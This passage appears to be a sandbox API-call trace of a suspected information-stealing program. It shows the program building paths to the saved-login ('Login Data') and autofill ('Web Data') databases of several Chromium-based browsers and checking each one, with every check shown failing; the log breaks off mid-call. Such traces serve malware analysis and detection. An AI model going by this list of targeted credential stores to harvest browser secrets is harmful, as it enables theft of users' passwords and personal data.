RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f80) returned 0x6b8f80 [0126.178] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.178] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\RockMelt\\User Data\\Default\\Web Data") returned 71 [0126.178] GetProcessHeap () returned 0x6a0000 [0126.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x92) returned 0x6b5990 [0126.178] GetProcessHeap () returned 0x6a0000 [0126.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.180] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.180] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\RockMelt\\User Data\\Default\\Web Data") returned 0 [0126.180] GetProcessHeap () returned 0x6a0000 [0126.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.181] GetProcessHeap () returned 0x6a0000 [0126.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f5e) returned 0x6b8f80 [0126.182] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.183] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalRockMelt\\Login Data") returned 54 [0126.183] GetProcessHeap () returned 0x6a0000 [0126.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x6b5990 [0126.183] GetProcessHeap () returned 0x6a0000 [0126.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.185] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.185] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalRockMelt\\Login Data") returned 0 [0126.185] GetProcessHeap () returned 0x6a0000 [0126.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.185] GetProcessHeap () returned 0x6a0000 [0126.185] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f6e) returned 0x6b8f80 [0126.186] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.187] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalRockMelt\\Default\\Login Data") returned 62 [0126.187] GetProcessHeap () returned 0x6a0000 [0126.187] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6b5990 [0126.187] GetProcessHeap () returned 0x6a0000 [0126.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.189] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.189] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalRockMelt\\Default\\Login Data") returned 0 [0126.189] GetProcessHeap () returned 0x6a0000 [0126.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.190] GetProcessHeap () returned 0x6a0000 [0126.190] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f84) returned 0x6b8f80 [0126.191] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.192] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Spark\\User Data\\Default\\Login Data") returned 70 [0126.192] GetProcessHeap () returned 0x6a0000 [0126.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x6b5990 [0126.192] GetProcessHeap () returned 0x6a0000 [0126.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.194] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.194] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Spark\\User Data\\Default\\Login Data") returned 0 [0126.195] GetProcessHeap () returned 0x6a0000 [0126.195] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.195] GetProcessHeap () returned 0x6a0000 [0126.195] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f80) returned 0x6b8f80 [0126.196] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.197] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Spark\\User Data\\Default\\Web Data") returned 68 [0126.197] GetProcessHeap () returned 0x6a0000 [0126.197] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8c) returned 0x6b5990 [0126.197] GetProcessHeap () returned 0x6a0000 [0126.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.198] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.198] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Spark\\User Data\\Default\\Web Data") returned 0 [0126.198] GetProcessHeap () returned 0x6a0000 [0126.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.199] GetProcessHeap () returned 0x6a0000 [0126.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f5e) returned 0x6b8f80 [0126.199] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.200] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSpark\\Login Data") returned 51 [0126.200] GetProcessHeap () returned 0x6a0000 [0126.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x6a) returned 0x6b5990 [0126.200] GetProcessHeap () returned 0x6a0000 [0126.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.201] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.201] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSpark\\Login Data") returned 0 [0126.202] GetProcessHeap () returned 0x6a0000 [0126.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.202] GetProcessHeap () returned 0x6a0000 [0126.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f6e) returned 0x6b8f80 [0126.203] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.204] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSpark\\Default\\Login Data") returned 59 [0126.204] GetProcessHeap () returned 0x6a0000 [0126.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7a) returned 0x6b5990 [0126.204] GetProcessHeap () returned 0x6a0000 [0126.204] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.205] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.205] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSpark\\Default\\Login Data") returned 0 [0126.205] GetProcessHeap () returned 0x6a0000 [0126.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.206] GetProcessHeap () returned 0x6a0000 [0126.206] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f84) returned 0x6b8f80 [0126.206] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.207] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\Default\\Login Data") returned 73 [0126.207] GetProcessHeap () returned 0x6a0000 [0126.207] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x96) returned 0x6b5990 [0126.207] GetProcessHeap () returned 0x6a0000 [0126.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.208] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.208] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\Default\\Login Data") returned 0 [0126.208] GetProcessHeap () returned 0x6a0000 [0126.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.209] GetProcessHeap () returned 0x6a0000 [0126.209] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f80) returned 0x6b8f80 [0126.209] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.210] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\Default\\Web Data") returned 71 [0126.210] GetProcessHeap () returned 0x6a0000 [0126.210] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x92) returned 0x6b5990 [0126.210] GetProcessHeap () returned 0x6a0000 [0126.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.211] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.211] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\Default\\Web Data") returned 0 [0126.216] GetProcessHeap () returned 0x6a0000 [0126.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.216] GetProcessHeap () returned 0x6a0000 [0126.216] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f5e) returned 0x6b8f80 [0126.217] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.218] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalChromium\\Login Data") returned 54 [0126.218] GetProcessHeap () returned 0x6a0000 [0126.218] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x6b5990 [0126.218] GetProcessHeap () returned 0x6a0000 [0126.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.219] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.219] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalChromium\\Login Data") returned 0 [0126.220] GetProcessHeap () returned 0x6a0000 [0126.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.220] GetProcessHeap () returned 0x6a0000 [0126.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f6e) returned 0x6b8f80 [0126.221] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.221] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalChromium\\Default\\Login Data") returned 62 [0126.221] GetProcessHeap () returned 0x6a0000 [0126.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6b5990 [0126.221] GetProcessHeap () returned 0x6a0000 [0126.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.224] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.224] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalChromium\\Default\\Login Data") returned 0 [0126.224] GetProcessHeap () returned 0x6a0000 [0126.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.226] GetProcessHeap () returned 0x6a0000 [0126.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f84) returned 0x6b8f80 [0126.227] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.228] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Titan Browser\\User Data\\Default\\Login Data") returned 78 [0126.228] GetProcessHeap () returned 0x6a0000 [0126.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x6aa9a0 [0126.228] GetProcessHeap () returned 0x6a0000 [0126.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.230] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.230] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Titan Browser\\User Data\\Default\\Login Data") returned 0 [0126.230] GetProcessHeap () returned 0x6a0000 [0126.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6aa9a0 | out: hHeap=0x6a0000) returned 1 [0126.231] GetProcessHeap () returned 0x6a0000 [0126.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f80) returned 0x6b8f80 [0126.232] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.233] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Titan Browser\\User Data\\Default\\Web Data") returned 76 [0126.233] GetProcessHeap () returned 0x6a0000 [0126.234] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9c) returned 0x6aa9a0 [0126.234] GetProcessHeap () returned 0x6a0000 [0126.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.235] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.236] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Titan Browser\\User Data\\Default\\Web Data") returned 0 [0126.236] GetProcessHeap () returned 0x6a0000 [0126.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6aa9a0 | out: hHeap=0x6a0000) returned 1 [0126.236] GetProcessHeap () returned 0x6a0000 [0126.236] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f5e) returned 0x6b8f80 [0126.241] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.242] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTitan Browser\\Login Data") returned 59 [0126.242] GetProcessHeap () returned 0x6a0000 [0126.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7a) returned 0x6b5990 [0126.242] GetProcessHeap () returned 0x6a0000 [0126.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.243] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.243] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTitan Browser\\Login Data") returned 0 [0126.243] GetProcessHeap () returned 0x6a0000 [0126.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.244] GetProcessHeap () returned 0x6a0000 [0126.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f6e) returned 0x6b8f80 [0126.245] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.245] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTitan Browser\\Default\\Login Data") returned 67 [0126.245] GetProcessHeap () returned 0x6a0000 [0126.245] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8a) returned 0x6b5990 [0126.246] GetProcessHeap () returned 0x6a0000 [0126.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.247] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.247] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTitan Browser\\Default\\Login Data") returned 0 [0126.247] GetProcessHeap () returned 0x6a0000 [0126.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.248] GetProcessHeap () returned 0x6a0000 [0126.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f84) returned 0x6b8f80 [0126.249] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.249] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\Default\\Login Data") returned 70 [0126.249] GetProcessHeap () returned 0x6a0000 [0126.249] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x6b5990 [0126.249] GetProcessHeap () returned 0x6a0000 [0126.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.251] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.251] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\Default\\Login Data") returned 0 [0126.251] GetProcessHeap () returned 0x6a0000 [0126.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.251] GetProcessHeap () returned 0x6a0000 [0126.252] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f80) returned 0x6b8f80 [0126.252] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.253] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\Default\\Web Data") returned 68 [0126.253] GetProcessHeap () returned 0x6a0000 [0126.254] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8c) returned 0x6b5990 [0126.254] GetProcessHeap () returned 0x6a0000 [0126.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.255] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.256] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\Default\\Web Data") returned 0 [0126.256] GetProcessHeap () returned 0x6a0000 [0126.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.265] GetProcessHeap () returned 0x6a0000 [0126.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f5e) returned 0x6b8f80 [0126.266] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.267] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTorch\\Login Data") returned 51 [0126.267] GetProcessHeap () returned 0x6a0000 [0126.267] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x6a) returned 0x6b5990 [0126.267] GetProcessHeap () returned 0x6a0000 [0126.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.269] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.269] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTorch\\Login Data") returned 0 [0126.269] GetProcessHeap () returned 0x6a0000 [0126.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.269] GetProcessHeap () returned 0x6a0000 [0126.269] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f6e) returned 0x6b8f80 [0126.270] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.271] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTorch\\Default\\Login Data") returned 59 [0126.271] GetProcessHeap () returned 0x6a0000 [0126.271] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7a) returned 0x6b5990 [0126.271] GetProcessHeap () returned 0x6a0000 [0126.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.273] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.274] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTorch\\Default\\Login Data") returned 0 [0126.275] GetProcessHeap () returned 0x6a0000 [0126.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.275] GetProcessHeap () returned 0x6a0000 [0126.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f84) returned 0x6b8f80 [0126.277] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.279] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Login Data") returned 85 [0126.279] GetProcessHeap () returned 0x6a0000 [0126.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xae) returned 0x6b5990 [0126.279] GetProcessHeap () returned 0x6a0000 [0126.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.281] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.281] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Login Data") returned 0 [0126.281] GetProcessHeap () returned 0x6a0000 [0126.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.282] GetProcessHeap () returned 0x6a0000 [0126.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f80) returned 0x6b8f80 [0126.283] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.284] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Web Data") returned 83 [0126.284] GetProcessHeap () returned 0x6a0000 [0126.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xaa) returned 0x6b5990 [0126.284] GetProcessHeap () returned 0x6a0000 [0126.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.286] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.286] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Web Data") returned 0 [0126.287] GetProcessHeap () returned 0x6a0000 [0126.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.288] GetProcessHeap () returned 0x6a0000 [0126.288] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f5e) returned 0x6b8f80 [0126.289] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.291] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalYandex\\YandexBrowser\\Login Data") returned 66 [0126.291] GetProcessHeap () returned 0x6a0000 [0126.291] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x88) returned 0x6b5990 [0126.291] GetProcessHeap () returned 0x6a0000 [0126.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.293] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.293] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalYandex\\YandexBrowser\\Login Data") returned 0 [0126.294] GetProcessHeap () returned 0x6a0000 [0126.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.294] GetProcessHeap () returned 0x6a0000 [0126.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f6e) returned 0x6b8f80 [0126.296] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.297] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalYandex\\YandexBrowser\\Default\\Login Data") returned 74 [0126.297] GetProcessHeap () returned 0x6a0000 [0126.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x98) returned 0x6b5990 [0126.297] GetProcessHeap () returned 0x6a0000 [0126.298] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.299] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.299] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalYandex\\YandexBrowser\\Default\\Login Data") returned 0 [0126.300] GetProcessHeap () returned 0x6a0000 [0126.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.300] GetProcessHeap () returned 0x6a0000 [0126.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f84) returned 0x6b8f80 [0126.302] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.303] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\Default\\Login Data") returned 85 [0126.303] GetProcessHeap () returned 0x6a0000 [0126.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xae) returned 0x6b5990 [0126.303] GetProcessHeap () returned 0x6a0000 [0126.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.305] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.307] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\Default\\Login Data") returned 0 [0126.307] GetProcessHeap () returned 0x6a0000 [0126.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.308] GetProcessHeap () returned 0x6a0000 [0126.308] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f80) returned 0x6b8f80 [0126.309] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.309] wvsprintfW (in: 